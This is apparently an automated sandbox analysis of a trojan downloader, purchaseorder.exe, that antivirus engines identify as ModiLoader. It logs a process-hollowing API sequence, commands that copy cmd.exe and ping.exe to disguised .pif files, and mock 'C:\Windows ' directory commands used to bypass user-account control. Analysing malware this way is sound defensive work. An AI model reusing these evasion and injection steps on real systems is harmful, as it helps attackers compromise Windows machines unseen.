CreateProcessInternalW Dec. 2, 2024, 9:59 a.m.	thread_identifier: 2832 thread_handle: 0x00000384 process_identifier: 2828 current_directory: filepath: track: 1 command_line: C:\Users\Public\Libraries\kzgqdtrG.pif filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000005ac	1	1
NtGetContextThread Dec. 2, 2024, 9:59 a.m.	thread_handle: 0x00000384	1	0
NtUnmapViewOfSection Dec. 2, 2024, 9:59 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2828 process_handle: 0x000005ac	1	0
NtAllocateVirtualMemory Dec. 2, 2024, 9:59 a.m.	process_identifier: 2828 region_size: 466853888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000005ac	1	0
NtAllocateVirtualMemory Dec. 2, 2024, 9:59 a.m.	process_identifier: 2828 region_size: 466851743 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000005ac		3221225496
NtSetContextThread Dec. 2, 2024, 9:59 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4246831 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000384 process_identifier: 2828	1	0
NtResumeThread Dec. 2, 2024, 9:59 a.m.	thread_handle: 0x00000384 suspend_count: 1 process_identifier: 2828	1	0
CreateProcessInternalW Dec. 2, 2024, 9:59 a.m.	thread_identifier: 2608 thread_handle: 0x00000084 process_identifier: 2604 current_directory: C:\Users\Public\Libraries filepath: C:\Windows\System32\esentutl.exe track: 1 command_line: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o filepath_r: C:\Windows\System32\esentutl.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW Dec. 2, 2024, 9:59 a.m.	thread_identifier: 2652 thread_handle: 0x0000008c process_identifier: 2648 current_directory: C:\Users\Public\Libraries filepath: C:\Windows\System32\esentutl.exe track: 1 command_line: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o filepath_r: C:\Windows\System32\esentutl.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW Dec. 2, 2024, 9:59 a.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: C:\Users\Public\Libraries filepath: C:\Users\Public\alpha.pif track: 0 command_line: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " filepath_r: C:\Users\Public\alpha.pif stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000		0
CreateProcessInternalW Dec. 2, 2024, 9:59 a.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: C:\Users\Public\Libraries filepath: C:\Users\Public\alpha.pif track: 0 command_line: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" filepath_r: C:\Users\Public\alpha.pif stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000		0
CreateProcessInternalW Dec. 2, 2024, 9:59 a.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: C:\Users\Public\Libraries filepath: C:\Users\Public\alpha.pif track: 0 command_line: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 filepath_r: C:\Users\Public\alpha.pif stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000		0
CreateProcessInternalW Dec. 2, 2024, 9:59 a.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: C:\Users\Public\Libraries filepath: C:\Users\Public\alpha.pif track: 0 command_line: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" filepath_r: C:\Users\Public\alpha.pif stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000		0
CreateProcessInternalW Dec. 2, 2024, 9:59 a.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: C:\Users\Public\Libraries filepath: C:\Users\Public\alpha.pif track: 0 command_line: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 filepath_r: C:\Users\Public\alpha.pif stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000		0
CreateProcessInternalW Dec. 2, 2024, 9:59 a.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: C:\Users\Public\Libraries filepath: C:\Users\Public\alpha.pif track: 0 command_line: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" filepath_r: C:\Users\Public\alpha.pif stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000		0

File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.ModiLoader.l!c
Cynet	Malicious (score: 99)
ALYac	Gen:Variant.Ser.Zusy.5168
Cylance	Unsafe
VIPRE	Gen:Variant.Ser.Zusy.5168
Sangfor	Downloader.Win32.Modiloader.Vh6m
CrowdStrike	win/malicious_confidence_60% (D)
BitDefender	Gen:Variant.Ser.Zusy.5168
K7GW	Trojan-Downloader ( 005ba4e71 )
K7AntiVirus	Trojan-Downloader ( 005ba4e71 )
Arcabit	Trojan.Ser.Zusy.D1430
VirIT	Trojan.Win32.DelphGen.HDN
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	Win32/TrojanDownloader.ModiLoader.AEJ
Avast	Win32:MalwareX-gen [Trj]
ClamAV	Win.Trojan.Generickdz-9951971-0
Kaspersky	HEUR:Trojan-Spy.Win32.Noon.gen
Alibaba	TrojanSpy:Win32/ModiLoader.de8ce50a
MicroWorld-eScan	Gen:Variant.Ser.Zusy.5168
Rising	Downloader.ModiLoader!8.17B13 (C64:YzY0Ogv/qeSm3GfU)
Emsisoft	Gen:Variant.Ser.Zusy.5168 (B)
F-Secure	Trojan.TR/AD.Nekark.avidg
DrWeb	Trojan.Starter.8287
Zillya	Trojan.Noon.Win32.32410
McAfeeD	ti!8EE464A74743
CTX	exe.trojan.modiloader
Sophos	Mal/Generic-S
Ikarus	Trojan.MSIL.Inject
FireEye	Gen:Variant.Ser.Zusy.5168
Jiangmin	TrojanSpy.Noon.thb
Google	Detected
Avira	TR/AD.Nekark.avidg
Antiy-AVL	Trojan[Spy]/Win32.Noon
Kingsoft	Win32.Trojan-Spy.Noon.gen
Microsoft	Trojan:Win32/ModiLoader.VAN!MTB
GData	Gen:Variant.Ser.Zusy.5168
Varist	W32/ModiLoader.R.gen!Eldorado
AhnLab-V3	Trojan/Win.ModiLoader.C5661541
McAfee	Artemis!FF74865E59DC
DeepInstinct	MALICIOUS
VBA32	TScope.Trojan.Delf
Malwarebytes	Trojan.MalPack.DLF
Panda	Trj/GdSda.A
Tencent	Malware.Win32.Gencirc.11cacd95
huorong	TrojanDownloader/Agent.bav
MaxSecure	Trojan.Malware.73698928.susgen
Fortinet	W32/ModiLoader.ABE!tr
AVG	Win32:MalwareX-gen [Trj]

purchaseorder.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All